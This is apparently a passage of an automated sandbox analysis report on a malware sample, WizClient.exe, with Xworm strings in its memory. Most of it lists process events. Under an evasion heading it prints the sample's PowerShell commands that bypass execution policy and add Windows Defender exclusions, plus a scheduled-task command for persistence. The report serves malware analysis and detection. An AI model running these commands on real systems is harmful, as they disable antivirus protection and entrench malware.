            Source: C:\Users\user\AppData\Local\WizClient.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\WizClient.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\WizClient.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\WizClient.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\WizClient.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\WizClient.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\WizClient.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\WizClient.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\WizClient.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\WizClient.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\WizClient.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\WizClient.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\WizClient.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\WizClient.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\WizClient.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\WizClient.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\WizClient.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\WizClient.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\WizClient.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\WizClient.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\WizClient.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\WizClient.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\WizClient.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\WizClient.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\WizClient.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\WizClient.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\WizClient.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\WizClient.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\WizClient.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\WizClient.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\WizClient.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\WizClient.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\WizClient.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\WizClient.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\WizClient.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\WizClient.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\WizClient.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\WizClient.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\WizClient.exeMemory allocated: 970000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\WizClient.exeMemory allocated: 1A430000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Local\WizClient.exeMemory allocated: 2040000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Local\WizClient.exeMemory allocated: 1A240000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Local\WizClient.exeMemory allocated: 1070000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Local\WizClient.exeMemory allocated: 1AC30000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Local\WizClient.exeMemory allocated: 840000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Local\WizClient.exeMemory allocated: 1A360000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Local\WizClient.exeMemory allocated: C90000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Local\WizClient.exeMemory allocated: 1A7B0000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\WizClient.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\AppData\Local\WizClient.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\user\AppData\Local\WizClient.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\user\AppData\Local\WizClient.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\user\AppData\Local\WizClient.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\user\Desktop\WizClient.exeWindow / User API: threadDelayed 3466Jump to behavior
            Source: C:\Users\user\Desktop\WizClient.exeWindow / User API: threadDelayed 6310Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5399Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4352Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7691Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1834Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7390Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2108Jump to behavior
            Source: C:\Users\user\Desktop\WizClient.exe TID: 7652Thread sleep time: -36893488147419080s >= -30000sJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8308Thread sleep time: -5534023222112862s >= -30000sJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8504Thread sleep count: 7691 > 30Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8504Thread sleep count: 1834 > 30Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8532Thread sleep time: -8301034833169293s >= -30000sJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8976Thread sleep time: -3689348814741908s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\WizClient.exe TID: 8320Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Users\user\AppData\Local\WizClient.exe TID: 8260Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Users\user\AppData\Local\WizClient.exe TID: 3976Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Users\user\AppData\Local\WizClient.exe TID: 2568Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\WizClient.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Users\user\Desktop\WizClient.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Users\user\Desktop\WizClient.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Users\user\Desktop\WizClient.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Users\user\Desktop\WizClient.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\WizClient.exeFile Volume queried: C:\ FullSizeInformation
            Source: C:\Users\user\AppData\Local\WizClient.exeFile Volume queried: C:\ FullSizeInformation
            Source: C:\Users\user\AppData\Local\WizClient.exeFile Volume queried: C:\ FullSizeInformation
            Source: C:\Users\user\AppData\Local\WizClient.exeFile Volume queried: C:\ FullSizeInformation
            Source: C:\Users\user\Desktop\WizClient.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\AppData\Local\WizClient.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\user\AppData\Local\WizClient.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\user\AppData\Local\WizClient.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\user\AppData\Local\WizClient.exeThread delayed: delay time: 922337203685477
            Source: WizClient.exe, 00000003.00000002.2589619208.000000001B33D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWkkr
            Source: WizClient.exe, 00000003.00000002.2589619208.000000001B33D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll{(*u
            Source: C:\Users\user\Desktop\WizClient.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\Desktop\WizClient.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\WizClient.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\AppData\Local\WizClient.exeProcess token adjusted: Debug
            Source: C:\Users\user\AppData\Local\WizClient.exeProcess token adjusted: Debug
            Source: C:\Users\user\Desktop\WizClient.exeMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Adds a directory exclusion to Windows Defender
            Source: C:\Users\user\Desktop\WizClient.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\WizClient.exe'
            Source: C:\Users\user\Desktop\WizClient.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\WizClient.exe'
            Source: C:\Users\user\Desktop\WizClient.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\WizClient.exe'Jump to behavior
            Source: C:\Users\user\Desktop\WizClient.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\WizClient.exe'Jump to behavior
            Bypasses PowerShell execution policy
            Source: C:\Users\user\Desktop\WizClient.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\WizClient.exe'
            Source: C:\Users\user\Desktop\WizClient.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\WizClient.exe'Jump to behavior
            Source: C:\Users\user\Desktop\WizClient.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'WizClient.exe'Jump to behavior
            Source: C:\Users\user\Desktop\WizClient.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\WizClient.exe'Jump to behavior
            Source: C:\Users\user\Desktop\WizClient.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "WizClient" /tr "C:\Users\user\AppData\Local\WizClient.exe"Jump to behavior
            Source: WizClient.exe, 00000003.00000002.2561891365.0000000002566000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'PING!<Xwormmm>Program Manager<Xwormmm>0
            Source: WizClient.exe, 00000003.00000002.2561891365.0000000002566000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
            Source: WizClient.exe, 00000003.00000002.2561891365.0000000002566000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager2A%
            Source: WizClient.exe, 00000003.00000002.2561891365.0000000002566000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: PING!<Xwormmm>Program Manager<Xwormmm>0
            Source: WizClient.exe, 00000003.00000002.2561891365.0000000002566000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'PING!<Xwormmm>Program Manager<Xwormmm>0@
            Source: C:\Users\user\Desktop\WizClient.exeQueries volume information: C:\Users\user\Desktop\WizClient.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WizClient.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\WizClient.exeQueries volume information: C:\Users\user\AppData\Local\WizClient.exe VolumeInformation
            Source: C:\Users\user\AppData\Local\WizClient.exeQueries volume information: C:\Users\user\AppData\Local\WizClient.exe VolumeInformation
            Source: C:\Users\user\AppData\Local\WizClient.exeQueries volume information: C:\Users\user\AppData\Local\WizClient.exe VolumeInformation
            Source: C:\Users\user\AppData\Local\WizClient.exeQueries volume information: C:\Users\user\AppData\Local\WizClient.exe VolumeInformation
